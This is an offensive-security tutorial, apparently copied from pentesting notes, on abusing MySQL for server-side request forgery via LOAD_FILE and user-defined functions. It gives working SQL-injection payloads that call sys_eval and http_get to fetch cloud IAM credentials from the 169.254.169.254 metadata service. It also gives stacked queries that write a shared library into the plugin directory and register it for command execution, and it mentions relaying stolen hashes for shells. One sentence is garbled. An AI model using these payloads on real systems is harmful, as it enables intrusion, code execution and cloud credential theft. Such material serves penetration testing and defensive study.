Mysql SSRF

Post copied from ****

Using LOAD_FILE/LOAD DATA/LOAD XML

Every SQL Out of Band data exfiltration article will use the LOAD_FILE() string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.

For example, if the secure_file_priv global variable was not set, the , which means that you can only use functions like LOAD_FILE('filename') or LOAD DATA [LOCAL] INFILE 'filename' INTO TABLE tablename to read files from the /var/lib/mysql-files/ directory. To be able to perform reads on files outside this directory, the secure_file_priv option has to be set to "" which can only be done by updating the database configuration file or by passing the --secure_file_priv="" as a startup parameter to the database service.

This Server Side Request Forgery, although useful, is restricted to only TCP port 445. You cannot control the port number, but can read information from shares setup with full read privs. Also, as has been shown with older research, you can use this limited SSRF capability to steal hashes and relay them to get shells, so it’s definitely useful.

Using User Defined Functions

Another cool technique with MySQL databases is the ability to use User Defined Functions (UDF) present in external library files that if present in specific locations or system $PATH then can be accessed from within MySQL.

You could use a SQL Injection to write a library (.so or .dll depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.

This has its own set of restrictions though. Based on the version of MySQL, which you can identify with select @@version, the directory where plugins can be loaded from is restricted. MySQL below v5.0.67 allowed for library files to be loaded from system path if the plugin_dir variable was not set. This has changed now and newer versions have the plugin_dir variable set to something like /usr/lib/mysql/plugin/, which is usually owned by root.

Basically for you to load a custom library into MySQL and call a function from the loaded library via SQL Injection, you would need the

• ability to write to the location specified in @@plugin_dir via SQL Injection

• file_priv set to Y in mysql.user for the current database user

• secure_file_priv set to "" so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.

x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //

x'; SELECT http_get('http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //

In any case, you need to transfer the library to the database server. You can do this in multiple ways

1. Use the MySQL hex() string function or something like xxd -p filename.so | tr -d '\n' to convert the contents of the library to hex format and then dumping it to the @@plugin_dir directory using x'; SELECT unhex(0x1234abcd12abcdef1223.....) into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' -- //

2. Alternatively, convert the contents of filename.so to base64 and use x';select from_base64("AAAABB....") into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' -- //

If the @@plugin_dir is not writable, then you are out of luck if the version is above v5.0.67. Otherwise, write to a different location that is in path and load the UDF library from there using

• for the lib_mysqludf_sys library - x';create function sys_eval returns string soname 'lib_mysqludf_sys.so'; -- //

• for the mysql-udf-http library - x';create function http_get returns string soname 'mysql-udf-http.so'; -- //